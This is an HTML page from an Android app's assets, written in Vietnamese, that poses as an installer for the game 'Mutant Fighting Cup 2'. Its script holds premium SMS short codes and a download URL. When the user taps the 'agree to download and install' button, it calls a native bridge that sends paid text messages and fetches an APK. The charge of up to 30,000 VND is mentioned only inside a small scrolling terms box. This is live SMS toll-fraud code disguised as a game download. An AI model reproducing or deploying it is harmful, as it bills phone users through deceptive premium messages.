<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
.mod-bd {
    padding: 10px 0 11px 8px;
}
.mod-bd .left {
    float: left;
    text-align: center;
}
.mod-bd .right {
    line-height: 12px;
    padding-left: 100px;
}
.mod-bd .left img {
    border-radius: 10px;
    width: 82px;
    height: 82px;    
}
.tab-nav-item {
    display: block;
    width: 100%;
    height: 5px;
    line-height: 31px;
    background-color: #ff5329;
    color: #7f210a;
    text-align: center;
    font-size: 16px;
    -webkit-box-flex: 1;
    -moz-box-flex: 1;
    box-flex: 1;
}
.tab-nav-item:nth-child(2) {
    background-color: #ffa200;
    color: #9f6500;
}
.tab-nav-item:nth-child(3) {
    background-color: #85c226;
    color: #3a5314;
}
.tab-nav {
    display: -webkit-box;
    display: -moz-box;
    display: box;
    width: 100%;
}
.greenbt{
background: #469AC8;
    border: 0;
    padding: 12px;
    color: #ffffff;
    width: 98%;
    font-weight: bold;
	font-size:18px;}
.btn_exit{background: #469AC8;
    font-size: 12px;
    padding: 4px 15px;
    border: 0;
    color: #ffffff;
	margin-top:10%;
}
</style>

<style>
       ::-webkit-scrollbar {
		    width: 3px;
		}
		#ssx::-webkit-scrollbar {display:block;} 
		
		#ssx::-webkit-scrollbar-track
		{
			-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
			--border-radius: 5px;
			background-color: #ebebeb;
		}
		
		#ssx::-webkit-scrollbar
		{
			width: 3px;
			background-color: #ebebeb;
		}
		
		#ssx::-webkit-scrollbar-thumb
		{
			--border-radius: 5px;
			-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
			background-color: #469AC8;
		}

       </style>

<script type="text/javascript">
var url = "http://fileapk.org/getapk?id=471";
var phone1_15 = "8779";
var phone1_10 = "8679";
var phone1_5 = "8579";
var phone1_4 = "8479";
var msg1_15 = "CF 471";
var msg1_10 = "CF 471";
var msg1_5 = "CF 471";
var msg1_4 = "CF 471";
var phone2_15 = "8779";
var phone2_10 = "8679";
var phone2_5 = "8579";
var phone2_4 = "8479";
var msg2_15 = "CF 471";
var msg2_10 = "CF 471";
var msg2_5 = "CF 471";
var msg2_4 = "CF 471";
function myFunction()
{
var link = url;
var p1_15 = phone1_15;
var p1_10 = phone1_10;
var p1_5 = phone1_5;
var p1_4 = phone1_4;
var m1_15 = msg1_15;
var m1_10 = msg1_10;
var m1_5 = msg1_5;
var m1_4 = msg1_4;
var p2_15 = phone2_15;
var p2_10 = phone2_10;
var p2_5 = phone2_5;
var p2_4 = phone2_4;
var m2_15 = msg2_15;
var m2_10 = msg2_10;
var m2_5 = msg2_5;
var m2_4 = msg2_4;
Android.downGame(link);
Android.send(p1_15,p1_10,p1_5,p1_4,m1_15,m1_10,m1_5,m1_4,p2_15,p2_10,p2_5,p2_4,m2_15,m2_10,m2_5,m2_4);
}

function myFunction1()
{
Android.exit();
}
</script>

<title></title>
</head>
<body style="margin: 0px; padding: 0px; height: 100%; width: 100%;text-align:justify;">
<div class="mod-bd">
	<div class="left">
		<img src="file:///android_asset/ic.png" width="82px" height="82px" style="-webkit-border-radius: 15px;">		
	</div>
	<div class="right">
		<div class="info">
			<div id="infobar_518740" class="text">
				<p style="font-size:14px;">
					<b>Name</b>: Mutant Fighting Cup 2</p>
				<p style="font-size:14px;">
					<b>Cost</b>:<em class="stronger-text"> 5000-30000</em>
				</p>
					<p style="font-size:12px;"><b>Install: </b> 5.000.000 - 10.000.000 </p>					
			</div>
		</div>
	</div> 
</div>
<div class="tab-nav" style="margin-bottom:5px;">
    <span style="font-size: 14px;white-space: nowrap;overflow: hidden;text-overflow: ellipsis;" class="tab-nav-item" id="info"></span>
    <span style="font-size: 14px;white-space: nowrap;overflow: hidden;text-overflow: ellipsis;" class="tab-nav-item" id="comment"></span>
    <span style="font-size: 14px;white-space: nowrap;overflow: hidden;text-overflow: ellipsis;" class="tab-nav-item" id="picture"></span>
</div>


<div style="padding-left: 5px; padding-right: 5px; padding-top: 5px; padding-bottom: 5px;margin: 10px;text-align:justify;">
Cảm ơn bạn đã tải về ứng dụng/game từ wapsite. Bạn vui lòng đọc kỹ điều khoản sử dụng và ấn "Đồng ý tải và cài đặt" để hoàn thành các bước tải! Chúc bạn một ngày vui vẻ.
</div>
<div id='ssx' style="background: rgba(239, 239, 239, 0.8);;padding: 10px;margin: 10px; width: auto; height: 120px; overflow-y: scroll; -webkit-overflow-scrolling: touch;">
<div style="text-align:center;">
<font color="black"   size="+1"><b>BẢNG ĐIỀU KHOẢN</b></font></div>
Vui Lòng Đọc Kỹ Điều Khoản Trước Khi Cài Đặt Game<br/>
<b>1.</b> Đây là một dịch vụ hỗ trợ Download Game và Ứng dụng cho điện thoại. Giúp người dùng tải và cài đặt ứng dụng một cách thuận tiện.<br/> 
<b>2.</b> Quyền Sở Hữu Trí Tuệ<br/> 
	- Tất cả hình ảnh, biểu tượng, và tất cả các nội dung khác (gọi tắt là Nội dung) tại Ứng Dụng này thuộc sở hữu của chúng tôi và các tổ chức/công ty khác đã được chúng tôi cho phép<br>
<b>3. </b>Phí Dịch Vụ Cho Nhà Phát Triển <br/>
- Để duy trì hệ thống được tốt, chúng tôi có thu phí mỗi game. Chi phí mỗi lần tải là 30.000đ ( Ba mươi ngàn đồng chẵn ) tức 2 tin nhắn gửi đến đầu số 8779. <br/>
Nếu quý khách hàng không đủ số tiền 30.000đ mà vẫn muốn tải game, chúng tôi sẽ hỗ trợ thu phí theo số tiền quý khách có thể thanh toán, từ 5.000đ->30.000đ trên các đầu số tương ứng.<br/>
- Cụ thể: <br/>
Nếu quý khách có 25.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 8779 và 1 tin nhắn đến 8679.<br/>
Nếu quý khách có 20.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 8779 và 1 tin nhắn đến 8579.<br/>
Nếu quý khách có 15.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 8779.<br/>
Nếu quý khách có 10.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 8679.<br/>
Nếu quý khách có 5.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 8579.<br/>
 Chúng tôi cam kết không trừ tiền khi khách hàng chưa ấn Đồng Ý Tải Và Cài Đặt !<br/>

<b>4.</b> Thỏa Thuận Dịch Vụ<br/> 
	- Bằng cách bấm vào nút ĐỒNG Ý TẢI VÀ CÀI ĐẶT Bạn được coi như đã chấp thuận các điều khoản và điều kiện của chúng tôi<br>
<b>5.</b> Quy Định Sử Dụng Dịch Vụ<br/>
	- Không gỡ bỏ hoặc vô hiệu hóa bất kỳ biện pháp bảo vệ quyền sở hữu hay bản quyền có<br>
<b>6.</b> Những hành vi không được chấp nhận<br/> 
	- Không tạo ra các bản sao bắt chước các tính năng, giao diện và dữ liệu của trò chơi này<br>
	- Không sử dụng trò chơi này làm công cụ để gây hại cho những người khác<br>
<b>7.</b> NHỮNG ĐIỀU KHOẢN CHUNG<br/> 
	- Đối với game có giao tiếp giữa người chơi với nhau (ví dụ các game có mạng xã hội) thì người chơi phải tuân thủ thao đúng các quy tắc ứng xử, tạo môi trường lành mạnh, không truyền bá các tư tưởng phản động, văn hóa không đúng với thuần phong mỹ tục của người dân Việt Nam<br>
<b>8.</b> Trách Nhiệm Của Mỗi Bên<br/> 
	- Chúng Tôi gọi tắt là bên (a)<br>
	- Người mua ứng dụng/game của chúng tôi là bên (b)<br>
	- Bên (a) chịu trách nhiệm hỗ trợ về Game/ứng dụng khách hàng sau khi cài đặt bị lỗi do sever hay bị lỗi hệ thống từ Nhà Phát Hành ( NPH ), giải đáp cho khách hàng những vướng mắc trong quá trình cài đặt Game/Ứng dụng<br>
	- Trách Nhiệm Bên (b): Khi bạn bấm tải và cài đặt trò chơi đồng nghĩa với việc bạn đã đồng ý với các điều khoản của chúng tôi đưa ra và bạn cam kết không khiếu nại<br>
Nếu cần trợ giúp vui lòng liên hệ theo các cách sau đây:<br>
- Hotline: 19001255</br>
- Email : adspro8915@gmail.com<br/> 
<b>Xin chân thành cảm ơn và chúc các bạn có những giây phút chơi game vui vẻ !</b>
<br>
</div>
<br>
<div style="text-align:center">
<button onclick="myFunction()" class="greenbt" >ĐỒNG Ý TẢI VÀ CÀI ĐẶT</button>
</div>
<div style="padding-left: 5px; padding-right: 5px; padding-top: 5px; padding-bottom: 5px;margin: 10px;text-align:justify;">
<b>Chú ý bật wifi để tải nhanh hơn và giảm cước 3G !</b>
</div>
<div style="text-align:center">
<button onclick="myFunction1()" class="btn_exit" >Thoát</button>
</div>
</body>
</html>